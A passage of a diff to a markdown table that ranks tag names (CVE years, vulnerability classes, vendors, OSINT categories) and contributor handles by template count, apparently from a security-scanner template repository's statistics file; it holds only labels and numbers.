| 137 | cckuailong | 18 | | | | | | | +| tcp | 137 | kazgangap | 20 | | | | | | | | aws | 135 | sullo | 18 | | | | | | | -| auth-bypass | 133 | bhutch | 17 | | | | | | | -| ssrf | 120 | lu4nx | 17 | | | | | | | -| amazon | 118 | random-robbie | 16 | | | | | | | -| phishing | 117 | shaikhyaser | 16 | | | | | | | -| cve2024 | 114 | 0xpugazh | 16 | | | | | | | +| cve2024 | 134 | cckuailong | 18 | | | | | | | +| auth-bypass | 133 | lu4nx | 17 | | | | | | | +| ssrf | 120 | bhutch | 17 | | | | | | | +| amazon | 118 | shaikhyaser | 16 | | | | | | | +| phishing | 117 | 0xpugazh | 16 | | | | | | | +| cms | 115 | random-robbie | 16 | | | | | | | | files | 113 | pr3r00t | 15 | | | | | | | -| cms | 113 | sheikhrishad | 15 | | | | | | | | cve2010 | 112 | unapibageek | 15 | | | | | | | -| cve2017 | 110 | tenbird | 14 | | | | | | | -| router | 108 | dogasantos | 14 | | | | | | | -| top-100 | 100 | securityforeveryone | 14 | | | | | | | -| aws-cloud-config | 91 | milo2012 | 14 | | | | | | | -| disclosure | 89 | r3dg33k | 14 | | | | | | | -| linux | 85 | nullfuzz | 13 | | | | | | | -| code | 81 | theabhinavgaur | 13 | | | | | | | +| cve2017 | 110 | sheikhrishad | 15 | | | | | | | +| router | 108 | r3dg33k | 14 | | | | | | | +| top-100 | 100 | milo2012 | 14 | | | | | | | +| aws-cloud-config | 91 | tenbird | 14 | | | | | | | +| disclosure | 89 | dogasantos | 14 | | | | | | | +| linux | 85 | kazet | 13 | | | | | | | +| code | 81 | nullfuzz | 13 | | | | | | | | local | 80 | melbadry9 | 13 | | | | | | | +| privesc | 79 | elsfa7110 | 13 | | | | | | | | seclists | 79 | sharath | 13 | | | | | | | -| privesc | 79 | 0ri2n | 13 | | | | | | | -| takeover | 79 | elsfa7110 | 13 | | | | | | | -| tokens | 78 | kazet | 12 | | | | | | | -| fileupload | 76 | suman_kar | 12 | | | | | | | -| oracle | 74 | meme-lord | 12 | | | | | | | +| tokens | 78 | theabhinavgaur | 13 | | | | | | | +| takeover | 78 | 0ri2n | 13 | | | | | | | +| fileupload | 76 | meme-lord | 12 | | | | | | | +| oracle | 74 | suman_kar | 12 | | | | | | | | kubernetes | 71 | cyllective | 11 | | | | | | | -| oss | 68 | wdahlenb | 11 | | | | | | | -| js | 67 | co5mos | 10 | | | | | | | -| cisco | 67 | nadino | 10 | | | | | | | -| enum | 65 | hackergautam | 10 | | | | | | | -| adobe | 63 | logicalhunter | 10 | | | | | | | -| k8s | 62 | 0x240x23elu | 10 | | | | | | | -| ir | 61 | random_robbie | 10 | | | | | | | -| huntr | 60 | alph4byt3 | 10 | | | | | | | -| cve2015 | 59 | momika233 | 9 | | | | | | | -| atlassian | 59 | emadshanab | 9 | | | | | | | -| detection | 57 | initstring | 9 | | | | | | | +| oss | 69 | wdahlenb | 11 | | | | | | | +| js | 68 | co5mos | 10 | | | | | | | +| cisco | 67 | 0x240x23elu | 10 | | | | | | | +| enum | 65 | alph4byt3 | 10 | | | | | | | +| adobe | 64 | hackergautam | 10 | | | | | | | +| k8s | 62 | nadino | 10 | | | | | | | +| ir | 61 | logicalhunter | 10 | | | | | | | +| huntr | 60 | random_robbie | 10 | | | | | | | +| cve2015 | 59 | adamcrosser | 9 | | | | | | | +| atlassian | 59 | initstring | 9 | | | | | | | | cve2016 | 57 | fabaff | 9 | | | | | | | -| vmware | 56 | olearycrew | 9 | | | | | | | -| google | 56 | oppsec | 9 | | | | | | | -| c2 | 55 | adamcrosser | 9 | | | | | | | +| detection | 57 | olearycrew | 9 | | | | | | | +| google | 56 | emadshanab | 9 | | | | | | | +| vmware | 56 | momika233 | 9 | | | | | | | +| c2 | 55 | oppsec | 9 | | | | | | | +| logs | 48 | veshraj | 8 | | | | | | | | tenable | 48 | that_juan_ | 8 | | | | | | | -| logs | 48 | noraj | 8 | | | | | | | -| log4j | 47 | irshad ahamed | 8 | | | | | | | -| vulhub | 46 | _0xf4n9x_ | 8 | | | | | | | -| hackerone | 46 | iamthefrogy | 8 | | | | | | | +| log4j | 47 | noraj | 8 | | | | | | | +| hackerone | 46 | irshad ahamed | 8 | | | | | | | +| vulhub | 46 | zh | 8 | | | | | | | | osint-gaming | 45 | aashiq | 8 | | | | | | | -| php | 45 | zh | 8 | | | | | | | -| aem | 45 | veshraj | 8 | | | | | | | -| debug | 44 | randomstr1ng | 7 | | | | | | | -| jndi | 44 | nodauf | 7 | | | | | | | -| cve2014 | 44 | caspergn | 7 | | | | | | | -| generic | 44 | its0x08 | 7 | | | | | | | -| deserialization | 43 | divya_mudgal | 7 | | | | | | | -| traversal | 42 | amit-jd | 7 | | | | | | | -| microsoft | 42 | huta0 | 7 | | | | | | | -| oa | 42 | kophjager007 | 7 | | | | | | | +| generic | 45 | iamthefrogy | 8 | | | | | | | +| aem | 45 | _0xf4n9x_ | 8 | | | | | | | +| php | 45 | harshbothra_ | 7 | | | | | | | +| jndi | 44 | amit-jd | 7 | | | | | | | +| cve2014 | 44 | divya_mudgal | 7 | | | | | | | +| debug | 44 | nodauf | 7 | | | | | | | +| deserialization | 44 | leovalcante | 7 | | | | | | | +| cnvd | 43 | dr_set | 7 | | | | | | | +| traversal | 43 | its0x08 | 7 | | | | | | | +| microsoft | 42 | caspergn | 7 | | | | | | | +| plugin | 42 | randomstr1ng | 7 | | | | | | | | osint-porn | 42 | tarunkoyalwar | 7 | | | | | | | -| plugin | 42 | leovalcante | 7 | | | | | | | -| osint-hobby | 42 | dr_set | 7 | | | | | | | -| cnvd | 41 | techryptic (@tech) | 7 | | | | | | | -| springboot | 41 | harshbothra_ | 7 | | | | | | | +| osint-hobby | 42 | huta0 | 7 | | | | | | | +| oa | 42 | kophjager007 | 7 | | | | | | | +| springboot | 41 | techryptic (@tech) | 7 | | | | | | | | misc | 40 | nvn1729 | 6 | | | | | | | -| miscellaneous | 38 | evan rubinstein | 6 | | | | | | | -| injection | 38 | puzzlepeaches | 6 | | | | | | | -| listing | 38 | ja1sh | 6 | | | | | | | -| jira | 37 | xelkomy | 6 | | | | | | | -| cti | 36 | praetorian-thendrickson | 6 | | | | | | | -| ibm | 36 | me_dheeraj | 6 | | | | | | | +| injection | 39 | forgedhallpass | 6 | | | | | | | +| miscellaneous | 38 | pathtaga | 6 | | | | | | | +| listing | 38 | gitlab red team | 6 | | | | | | | +| jira | 37 | praetorian-thendrickson | 6 | | | | | | | +| ibm | 36 | imnightmaree | 6 | | | | | | | +| cti | 36 | devang-solanki | 6 | | | | | | | +| osint-misc | 35 | xelkomy | 6 | | | | | | | +| k8s-cluster-security | 34 | clem9669 | 6 | | | | | | | +| sap | 34 | hahwul | 6 | | | | | | | +| fuzz | 34 | byt3bl33d3r | 6 | | | | | | | +| ssl | 33 | __fazal | 6 | | | | | | | +| devsecops | 32 | icarot | 6 | | | | | | | +| dlink | 32 | evan rubinstein | 6 | | | | | | | +| tls | 32 | puzzlepeaches | 6 | | | | | | | +| osint-tech | 31 | pentest_swissky | 6 | | | | | | | +| wp-theme | 30 | lucky0x0d | 6 | | | | | | | +| ec2 | 30 | ja1sh | 6 | | | | | | | +| osint-coding | 30 | justaacat | 6 | | | | | | | +| fortinet | 28 | megamansec | 6 | | | | | | | +| gitlab | 28 | me_dheeraj | 6 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| osint-misc | 35 | gitlab red team | 6 | | | | | | | -| fuzz | 34 | justaacat | 6 | | | | | | | -| k8s-cluster-security | 34 | devang-solanki | 6 | | | | | | | -| sap | 34 | __fazal | 6 | | | | | | | -| ssl | 33 | byt3bl33d3r | 6 | | | | | | | -| devsecops | 32 | clem9669 | 6 | | | | | | | -| tls | 32 | hahwul | 6 | | | | | | | -| osint-tech | 31 | lucky0x0d | 6 | | | | | | | -| dlink | 31 | imnightmaree | 6 | | | | | | | -| ec2 | 30 | pathtaga | 6 | | | | | | | -| wp-theme | 30 | megamansec | 6 | | | | | | | -| osint-coding | 30 | forgedhallpass | 6 | | | | | | | -| fortinet | 28 | pentest_swissky | 6 | | | | | | | -| api | 28 | yanyun | 5 | | | | | | | -| gitlab | 28 | robotshell | 5 | | | | | | | -| lfr | 27 | isacaya | 5 | | | | | | | -| bestwebsoft | 27 | joanbono | 5 | | | | | | | -| proxy | 27 | prajiteshsingh | 5 | | | | | | | -| citrix | 27 | defr0ggy | 5 | | | | | | | -| dns | 27 | r3naissance | 5 | | | | | | | -| cve2012 | 26 | s0obi | 5 | | | | | | | -| ssh | 26 | r12w4n | 5 | | | | | | | +| api | 28 | mr-xn | 5 | | | | | | | +| citrix | 27 | ice3man543 | 5 | | | | | | | +| file-upload | 27 | pulsesecurity.co.nz | 5 | | | | | | | +| dns | 27 | joanbono | 5 | | | | | | | +| lfr | 27 | robotshell | 5 | | | | | | | +| bestwebsoft | 27 | r12w4n | 5 | | | | | | | +| proxy | 27 | ganofins | 5 | | | | | | | +| firewall | 26 | s0obi | 5 | | | | | | | | zohocorp | 26 | gtrrnr | 5 | | | | | | | -| firewall | 26 | kh4sh3i | 5 | | | | | | | -| file-upload | 25 | your3cho | 5 | | | | | | | -| weaver | 25 | podalirius | 5 | | | | | | | -| manageengine | 25 | ganofins | 5 | | | | | | | -| osint-images | 24 | vicrack | 5 | | | | | | | -| admin | 24 | powerexploit | 5 | | | | | | | -| osint-business | 24 | mr-xn | 5 | | | | | | | -| osint-shopping | 24 | arm!tage | 5 | | | | | | | -| osint-finance | 24 | pulsesecurity.co.nz | 5 | | | | | | | -| zoho | 24 | shine | 5 | | | | | | | -| xxe | 23 | andreluna | 5 | | | | | | | -| stored-xss | 23 | panch0r3d | 5 | | | | | | | -| tomcat | 23 | iamnooob | 4 | | | | | | | -| audit | 23 | shankar acharya | 4 | | | | | | | -| yonyou | 23 | scent2d | 4 | | | | | | | -| github | 22 | k0pak4 | 4 | | | | | | | -| prestashop | 22 | nybble04 | 4 | | | | | | | -| cicd | 22 | 0xr2r | 4 | | | | | | | -| dast | 22 | incogbyte | 4 | | | | | | | -| s3 | 22 | wisnupramoedya | 4 | | | | | | | -| ecology | 21 | ice3man543 | 4 | | | | | | | -| weblogic | 21 | m4lwhere | 4 | | | | | | | -| printer | 21 | e_schultze_ | 4 | | | | | | | -| msf | 21 | ggranjus | 4 | | | | | | | -| camera | 20 | 3th1c_yuk1 | 4 | | | | | | | -| ftp | 20 | h1ei1 | 4 | | | | | | | -| jenkins | 20 | heeress | 4 | | | | | | | -| wavlink | 19 | king-alexander | 4 | | | | | | | -| grafana | 19 | lum8rjack | 4 | | | | | | | -| struts | 19 | dolev farhi | 4 | | | | | | | -| confluence | 19 | dadevel | 4 | | | | | | | -| hp | 19 | tanq16 | 4 | | | | | | | -| rukovoditel | 19 | flx | 4 | | | | | | | -| apt | 19 | xxcdd | 4 | | | | | | | -| osint-music | 18 | cookiehanhoan | 4 | | | | | | | -| coldfusion | 18 | jpg0mez | 4 | | | | | | | -| android | 18 | 0xkayala | 3 | | | | | | | -| node.js | 18 | canberbamber | 3 | | | | | | | -| cve2011 | 18 | coldfish | 3 | | | | | | | -| vpn | 18 | omranisecurity | 3 | | | | | | | -| ruijie | 18 | lark-lab | 3 | | | | | | | -| headless | 17 | evergreencartoons | 3 | | | | | | | -| nginx | 17 | splint3r7 | 3 | | | | | | | -| honeypot | 17 | f1tz | 3 | | | | | | | -| mail | 17 | shifacyclewala | 3 | | | | | | | -| azure | 17 | parth | 3 | | | | | | | -| microweber | 17 | jarijaas | 3 | | | | | | | -| backdoor | 16 | aringo | 3 | | | | | | | -| service | 16 | dudez | 3 | | | | | | | -| jarm | 16 | farish | 3 | | | | | | | -| magento | 16 | alifathi-h1 | 3 | | | | | | | -| rconfig | 16 | j3ssie | 3 | | | | | | | -| cve2009 | 16 | matt galligan | 3 | | | | | | | -| status | 16 | impramodsargar | 3 | | | | | | | -| alibaba | 16 | badboycxcc | 3 | | | | | | | -| backup | 16 | xianke | 3 | | | | | | | -| osint-blog | 16 | taielab | 3 | | | | | | | -| zyxel | 16 | salts | 3 | | | | | | | -| tongda | 15 | dr0pd34d | 3 | | | | | | | -| redhat | 15 | e1a | 3 | | | | | | | -| ssti | 15 | swissky | 3 | | | | | | | -| nagios | 15 | ambassify | 3 | | | | | | | -| docker | 15 | 0w4ys | 3 | | | | | | | -| seeyon | 15 | mavericknerd | 3 | | | | | | | -| ruby | 15 | ph33r | 3 | | | | | | | -| installer | 15 | binaryfigments | 3 | | | | | | | -| info-leak | 15 | yash anand @yashanand155 | 3 | | | | | | | -| bypass | 15 | vsh00t | 3 | | | | | | | -| moosocial | 15 | charles d | 3 | | | | | | | -| woocommerce | 15 | andydoering | 3 | | | | | | | -| cve2008 | 15 | fyoorer | 3 | | | | | | | -| dashboard | 15 | atomiczsec | 3 | | | | | | | -| java | 15 | yuzhe-zhang-0 | 3 | | | | | | | -| netgear | 15 | unstabl3 | 3 | | | | | | | -| cve2013 | 15 | z3bd | 3 | | | | | | | -| cnvd2021 | 15 | skeltavik | 3 | | | | | | | -| setup | 15 | bernardofsr | 3 | | | | | | | -| ivanti | 15 | whoever | 3 | | | | | | | -| nodejs | 14 | fxploit | 3 | | | | | | | -| osint-health | 14 | imjust0 | 3 | | | | | | | -| jboss | 14 | randomrobbie | 3 | | | | | | | -| smtp | 14 | johnjhacking | 3 | | | | | | | -| domainmod | 14 | cheesymoon | 3 | | | | | | | -| osint-art | 14 | me9187 | 3 | | | | | | | -| icewarp | 14 | lucasljm2001 | 3 | | | | | | | -| git | 14 | thomas_from_offensity | 3 | | | | | | | -| rds | 14 | arcc | 3 | | | | | | | -| redis | 14 | _generic_human_ | 3 | | | | | | | -| dell | 14 | sushantkamble | 3 | | | | | | | -| creds-stuffing | 14 | huowuzhao | 3 | | | | | | | -| npm | 14 | emenalf | 3 | | | | | | | -| login-check | 14 | c4sper0 | 3 | | | | | | | -| node | 14 | ekrause | 3 | | | | | | | -| airflow | 13 | davidmckennirey | 3 | | | | | | | -| abstractapi | 13 | true13 | 3 | | | | | | | -| osint-political | 13 | vagnerd | 3 | | | | | | | -| sonicwall | 13 | dheerajmadhukar | 2 | | | | | | | -| osint-dating | 13 | sascha brendel | 2 | | | | | | | -| rails | 13 | x1m_martijn | 2 | | | | | | | -| fortigate | 13 | ricardo maia (brainfork) | 2 | | | | | | | -| cuppacms | 13 | zy9ard3 | 2 | | | | | | | -| mysql | 13 | brucelsone | 2 | | | | | | | -| hashicorp | 13 | brenocss | 2 | | | | | | | -| fuzzing | 13 | raesene | 2 | | | | | | | -| postgresql | 13 | 6mile | 2 | | | | | | | -| cuppa | 13 | ep1csage | 2 | | | | | | | -| windows | 13 | codexlynx | 2 | | | | | | | -| auth | 13 | florianmaak | 2 | | | | | | | -| laravel | 13 | usdag | 2 | | | | | | | -| graphql | 13 | sbani | 2 | | | | | | | -| doppler | 12 | davidegirardi | 2 | | | | | | | -| webserver | 12 | parzival | 2 | | | | | | | -| drupal | 12 | moritz nentwig | 2 | | | | | | | -| deployments | 12 | y4er | 2 | | | | | | | -| newrelic | 12 | msegoviag | 2 | | | | | | | -| jetbrains | 12 | supr4s | 2 | | | | | | | -| ofbiz | 12 | christianpoeschl | 2 | | | | | | | -| vbulletin | 12 | danielmofer | 2 | | | | | | | -| netsweeper | 12 | lotusdll | 2 | | | | | | | -| kafka | 12 | luci | 2 | | | | | | | -| phpgurukul | 12 | redteambrasil | 2 | | | | | | | -| zimbra | 12 | rafaelwdornelas | 2 | | | | | | | -| smb | 12 | wa1tf0rme | 2 | | | | | | | -| osint-video | 11 | nuk3s3c | 2 | | | | | | | -| spring | 11 | hetroublemakr | 2 | | | | | | | -| dedecms | 11 | ajaysenr | 2 | | | | | | | -| glpi | 11 | afaq | 2 | | | | | | | -| iis | 11 | dbrwsky | 2 | | | | | | | -| xwiki | 11 | ayadim | 2 | | | | | | | -| iam | 11 | n-thumann | 2 | | | | | | | -| jolokia | 11 | zomsop82 | 2 | | | | | | | -| django | 11 | 666asd | 2 | | | | | | | -| xstream | 11 | thevillagehacker | 2 | | | | | | | -| prometheus | 11 | kishore-hariram | 2 | | | | | | | -| hikvision | 11 | serrapa | 2 | | | | | | | -| fastjson | 11 | lstatro | 2 | | | | | | | -| cache | 11 | geekby | 2 | | | | | | | -| phpmyadmin | 10 | paperpen | 2 | | | | | | | -| xstream_project | 10 | ree4pwn | 2 | | | | | | | -| zabbix | 10 | liwermor | 2 | | | | | | | -| db | 10 | 0xcrypto | 2 | | | | | | | -| elasticsearch | 10 | pxmme1337 | 2 | | | | | | | -| dahua | 10 | 0xrudra | 2 | | | | | | | -| dropbox | 10 | joeldeleep | 2 | | | | | | | -| blind | 10 | supras | 2 | | | | | | | -| samsung | 10 | bmcel | 2 | | | | | | | -| digitalocean | 10 | gevakun | 2 | | | | | | | -| solarview | 10 | bsysop | 2 | | | | | | | -| thinkphp | 10 | bananabr | 2 | | | | | | | -| progress | 10 | t3l3machus | 2 | | | | | | | -| sitecore | 10 | hackerarpan | 2 | | | | | | | -| symfony | 10 | foulenzer | 2 | | | | | | | -| solr | 10 | korteke | 2 | | | | | | | -| crlf | 10 | charles d. | 2 | | | | | | | -| exchange | 9 | kre80r | 2 | | | | | | | -| sophos | 9 | sinkettu | 2 | | | | | | | -| cloudtrail | 9 | socketz | 2 | | | | | | | -| sangfor | 9 | 8arthur | 2 | | | | | | | -| elastic | 9 | shelled | 2 | | | | | | | -| python | 9 | 0xsapra | 2 | | | | | | | -| pfsense | 9 | gal nagli | 2 | | | | | | | -| facebook | 9 | thezakman | 2 | | | | | | | -| secret | 9 | thardt-praetorian | 2 | | | | | | | -| bitbucket | 9 | udit_thakkur | 2 | | | | | | | -| gitea | 9 | icarot | 2 | | | | | | | -| versa | 9 | 0xnirvana | 2 | | | | | | | -| druid | 9 | clarkvoss | 2 | | | | | | | -| firebase | 9 | dahse89 | 2 | | | | | | | -| joomla\! | 9 | koti2 | 2 | | | | | | | -| console | 9 | convisoappsec | 2 | | | | | | | -| artica | 9 | mzack9999 | 2 | | | | | | | -| instrusive | 9 | michal mikolas (nanuqcz) | 2 | | | | | | | -| vcenter | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| scada | 9 | joshua rogers | 2 | | | | | | | -| f5 | 9 | mrharshvardhan | 2 | | | | | | | -| lucee | 9 | manas_harsh | 2 | | | | | | | -| cnvd2020 | 9 | joshlarsen | 2 | | | | | | | -| opencats | 9 | streetofhackerr007 | 2 | | | | | | | -| wso2 | 9 | dogancanbakir | 2 | | | | | | | -| gateway | 9 | vavkamil | 2 | | | | | | | -| moodle | 9 | kiblyn11 | 2 | | | | | | | -| kube | 9 | cckuakilong | 2 | | | | | | | -| discord | 8 | amsda | 2 | | | | | | | -| atom | 8 | martincodes-de | 2 | | | | | | | -| phpinfo | 8 | shankaracharya | 2 | | | | | | | -| recon | 8 | nkxxkn | 2 | | | | | | | -| lfprojects | 8 | h0j3n | 2 | | | | | | | -| bucket | 8 | z0ne | 2 | | | | | | | -| nagiosxi | 8 | pbuff07 | 2 | | | | | | | -| mirai | 8 | egemenkochisarli | 2 | | | | | | | -| oauth | 8 | maximus decimus | 2 | | | | | | | -| osint-news | 8 | g4l1t0 | 2 | | | | | | | -| metadata | 8 | v0idc0de | 2 | | | | | | | -| wanhu | 8 | d4vy | 2 | | | | | | | -| mlflow | 8 | 0xelkomy | 2 | | | | | | | -| cacti | 8 | thabisocn | 2 | | | | | | | -| microfocus | 8 | paradessia | 2 | | | | | | | -| cisco-switch | 8 | k11h-de | 2 | | | | | | | -| emerge | 8 | arliya | 2 | | | | | | | -| phpjabbers | 8 | israel comazzetto dos reis | 2 | | | | | | | -| manager | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| spotweb_project | 8 | github.com/its0x08 | 2 | | | | | | | -| symantec | 8 | danmcinerney | 2 | | | | | | | -| unauthenticated | 8 | c3l3si4n | 2 | | | | | | | -| cloud-enum | 8 | amirhossein raeisi | 2 | | | | | | | -| odoo | 8 | sy3omda | 2 | | | | | | | -| solarwinds | 8 | randomdhiraj | 2 | | | | | | | -| config-audit | 8 | myztique | 2 | | | | | | | -| spotweb | 8 | w4cky_ | 2 | | | | | | | -| e-office | 8 | herry | 2 | | | | | | | -| default-page | 8 | bp0lr | 2 | | | | | | | -| huawei | 8 | bing0o | 2 | | | | | | | -| go | 8 | ehsahil | 2 | | | | | | | -| nexus | 8 | topscoder | 2 | | | | | | | -| hms | 8 | 0xsmiley | 2 | | | | | | | -| ognl | 8 | notnotnotveg | 2 | | | | | | | -| openemr | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | -| websphere | 7 | cocxanh | 2 | | | | | | | -| database | 7 | uomogrande | 2 | | | | | | | -| vrealize | 7 | hakimkt | 1 | | | | | | | -| opensis | 7 | sechunt3r | 1 | | | | | | | -| mobileiron | 7 | ramkrishna sawant | 1 | | | | | | | -| ldap | 7 | michael wedl | 1 | | | | | | | -| landray | 7 | william söderberg @ withsecure | 1 | | | | | | | -| teamcity | 7 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| pmb | 7 | ahmed sherif | 1 | | | | | | | -| ruckus | 7 | marcio mendes | 1 | | | | | | | -| fortios | 7 | bywalks | 1 | | | | | | | -| gradio | 7 | aravind | 1 | | | | | | | -| linkedin | 7 | exceed | 1 | | | | | | | -| maps | 7 | ohlinge | 1 | | | | | | | -| nacos | 7 | rojanrijal | 1 | | | | | | | -| mongodb | 7 | sospiro | 1 | | | | | | | -| bigip | 7 | aaron_costello | 1 | | | | | | | +| admin | 26 | andreluna | 5 | | | | | | | +| manageengine | 26 | defr0ggy | 5 | | | | | | | +| ssh | 26 | vicrack | 5 | | | | | | | +| cve2012 | 26 | powerexploit | 5 | | | | | | | +| weaver | 25 | arm!tage | 5 | | | | | | | +| xxe | 25 | r3naissance | 5 | | | | | | | +| dast | 25 | yanyun | 5 | | | | | | | +| zoho | 25 | kh4sh3i | 5 | | | | | | | +| printer | 24 | podalirius | 5 | | | | | | | +| osint-shopping | 24 | panch0r3d | 5 | | | | | | | +| osint-business | 24 | your3cho | 5 | | | | | | | +| osint-images | 24 | isacaya | 5 | | | | | | | +| osint-finance | 24 | shine | 5 | | | | | | | +| yonyou | 23 | prajiteshsingh | 5 | | | | | | | +| audit | 23 | king-alexander | 5 | | | | | | | +| stored-xss | 23 | cookiehanhoan | 4 | | | | | | | +| tomcat | 23 | jpg0mez | 4 | | | | | | | +| prestashop | 22 | 0xr2r | 4 | | | | | | | +| github | 22 | dadevel | 4 | | | | | | | +| cicd | 22 | nybble04 | 4 | | | | | | | +| s3 | 22 | ggranjus | 4 | | | | | | | +| ecology | 21 | heeress | 4 | | | | | | | +| weblogic | 21 | k0pak4 | 4 | | | | | | | +| msf | 21 | 3th1c_yuk1 | 4 | | | | | | | +| ftp | 20 | dolev farhi | 4 | | | | | | | +| jenkins | 20 | h1ei1 | 4 | | | | | | | +| info-leak | 20 | xxcdd | 4 | | | | | | | +| camera | 20 | flx | 4 | | | | | | | +| wavlink | 20 | wisnupramoedya | 4 | | | | | | | +| grafana | 19 | iamnooob | 4 | | | | | | | +| vpn | 19 | tanq16 | 4 | | | | | | | +| apt | 19 | scent2d | 4 | | | | | | | +| hp | 19 | m4lwhere | 4 | | | | | | | +| struts | 19 | incogbyte | 4 | | | | | | | +| confluence | 19 | e_schultze_ | 4 | | | | | | | +| rukovoditel | 19 | shankar acharya | 4 | | | | | | | +| backdoor | 18 | lum8rjack | 4 | | | | | | | +| ruijie | 18 | coldfish | 3 | | | | | | | +| cve2011 | 18 | davidmckennirey | 3 | | | | | | | +| coldfusion | 18 | lark-lab | 3 | | | | | | | +| osint-music | 18 | bernardofsr | 3 | | | | | | | +| android | 18 | atomiczsec | 3 | | | | | | | +| node.js | 18 | dr0pd34d | 3 | | | | | | | +| magento | 17 | binaryfigments | 3 | | | | | | | +| honeypot | 17 | cheesymoon | 3 | | | | | | | +| azure | 17 | canberbamber | 3 | | | | | | | +| zyxel | 17 | _generic_human_ | 3 | | | | | | | +| backup | 17 | charles d | 3 | | | | | | | +| headless | 17 | johnjhacking | 3 | | | | | | | +| mail | 17 | salts | 3 | | | | | | | +| microweber | 17 | impramodsargar | 3 | | | | | | | +| nginx | 17 | whoever | 3 | | | | | | | +| bypass | 16 | skeltavik | 3 | | | | | | | +| ssti | 16 | imjust0 | 3 | | | | | | | +| rconfig | 16 | me9187 | 3 | | | | | | | +| dashboard | 16 | j3ssie | 3 | | | | | | | +| alibaba | 16 | evergreencartoons | 3 | | | | | | | +| osint-blog | 16 | randomrobbie | 3 | | | | | | | +| jarm | 16 | swissky | 3 | | | | | | | +| status | 16 | parth | 3 | | | | | | | +| cve2009 | 16 | sushantkamble | 3 | | | | | | | +| service | 16 | thomas_from_offensity | 3 | | | | | | | +| woocommerce | 15 | fxploit | 3 | | | | | | | +| ruby | 15 | lucasljm2001 | 3 | | | | | | | +| seeyon | 15 | arcc | 3 | | | | | | | +| moosocial | 15 | ekrause | 3 | | | | | | | +| cve2008 | 15 | jarijaas | 3 | | | | | | | +| redhat | 15 | ambassify | 3 | | | | | | | +| docker | 15 | z3bd | 3 | | | | | | | +| installer | 15 | 0xkayala | 3 | | | | | | | +| ivanti | 15 | xianke | 3 | | | | | | | +| java | 15 | emenalf | 3 | | | | | | | +| xwiki | 15 | badboycxcc | 3 | | | | | | | +| cve2013 | 15 | mavericknerd | 3 | | | | | | | +| tongda | 15 | shifacyclewala | 3 | | | | | | | +| netgear | 15 | aringo | 3 | | | | | | | +| nagios | 15 | farish | 3 | | | | | | | +| cnvd2021 | 15 | matt galligan | 3 | | | | | | | +| setup | 15 | vsh00t | 3 | | | | | | | +| login-check | 14 | alifathi-h1 | 3 | | | | | | | +| osint-health | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| domainmod | 14 | dudez | 3 | | | | | | | +| node | 14 | taielab | 3 | | | | | | | +| git | 14 | f1tz | 3 | | | | | | | +| osint-art | 14 | e1a | 3 | | | | | | | +| rds | 14 | true13 | 3 | | | | | | | +| nodejs | 14 | splint3r7 | 3 | | | | | | | +| icewarp | 14 | andydoering | 3 | | | | | | | +| creds-stuffing | 14 | yash anand @yashanand155 | 3 | | | | | | | +| dell | 14 | c4sper0 | 3 | | | | | | | +| jboss | 14 | unstabl3 | 3 | | | | | | | +| npm | 14 | huowuzhao | 3 | | | | | | | +| smtp | 14 | vagnerd | 3 | | | | | | | +| redis | 14 | 0w4ys | 3 | | | | | | | +| abstractapi | 13 | fyoorer | 3 | | | | | | | +| hashicorp | 13 | ph33r | 3 | | | | | | | +| airflow | 13 | omranisecurity | 3 | | | | | | | +| sonicwall | 13 | sascha brendel | 2 | | | | | | | +| cuppa | 13 | davidegirardi | 2 | | | | | | | +| fortigate | 13 | charles d. | 2 | | | | | | | +| auth | 13 | n-thumann | 2 | | | | | | | +| laravel | 13 | 0xnirvana | 2 | | | | | | | +| osint-political | 13 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| windows | 13 | z0ne | 2 | | | | | | | +| graphql | 13 | hetroublemakr | 2 | | | | | | | +| cuppacms | 13 | danielmofer | 2 | | | | | | | +| rails | 13 | usdag | 2 | | | | | | | +| kafka | 13 | egemenkochisarli | 2 | | | | | | | +| postgresql | 13 | brenocss | 2 | | | | | | | +| mysql | 13 | 0xcrypto | 2 | | | | | | | +| osint-dating | 13 | bmcel | 2 | | | | | | | +| fuzzing | 13 | thevillagehacker | 2 | | | | | | | +| jetbrains | 12 | x1m_martijn | 2 | | | | | | | +| spring | 12 | herry | 2 | | | | | | | +| phpgurukul | 12 | d4vy | 2 | | | | | | | +| cache | 12 | mrharshvardhan | 2 | | | | | | | +| vbulletin | 12 | socketz | 2 | | | | | | | +| netsweeper | 12 | liwermor | 2 | | | | | | | +| ofbiz | 12 | wa1tf0rme | 2 | | | | | | | +| webserver | 12 | joeldeleep | 2 | | | | | | | +| newrelic | 12 | 0xelkomy | 2 | | | | | | | +| zimbra | 12 | msegoviag | 2 | | | | | | | +| doppler | 12 | brucelsone | 2 | | | | | | | +| drupal | 12 | cocxanh | 2 | | | | | | | +| smb | 12 | foulenzer | 2 | | | | | | | +| deployments | 12 | topscoder | 2 | | | | | | | +| django | 11 | danmcinerney | 2 | | | | | | | +| xstream | 11 | rafaelwdornelas | 2 | | | | | | | +| fastjson | 11 | ajaysenr | 2 | | | | | | | +| iis | 11 | florianmaak | 2 | | | | | | | +| prometheus | 11 | luci | 2 | | | | | | | +| jolokia | 11 | notnotnotveg | 2 | | | | | | | +| osint-video | 11 | sy3omda | 2 | | | | | | | +| iam | 11 | c3l3si4n | 2 | | | | | | | +| glpi | 11 | thabisocn | 2 | | | | | | | +| dedecms | 11 | h0j3n | 2 | | | | | | | +| hikvision | 11 | t3l3machus | 2 | | | | | | | +| solarview | 10 | uomogrande | 2 | | | | | | | +| digitalocean | 10 | sinkettu | 2 | | | | | | | +| elasticsearch | 10 | amsda | 2 | | | | | | | +| zabbix | 10 | nkxxkn | 2 | | | | | | | +| blind | 10 | manas_harsh | 2 | | | | | | | +| symfony | 10 | geekby | 2 | | | | | | | +| instrusive | 10 | sbani | 2 | | | | | | | +| phpmyadmin | 10 | cckuakilong | 2 | | | | | | | +| xstream_project | 10 | github.com/its0x08 | 2 | | | | | | | +| solr | 10 | supr4s | 2 | | | | | | | +| samsung | 10 | codexlynx | 2 | | | | | | | +| thinkphp | 10 | serrapa | 2 | | | | | | | +| dahua | 10 | pbuff07 | 2 | | | | | | | +| sitecore | 10 | supras | 2 | | | | | | | +| dropbox | 10 | joshua rogers | 2 | | | | | | | +| progress | 10 | afaq | 2 | | | | | | | +| 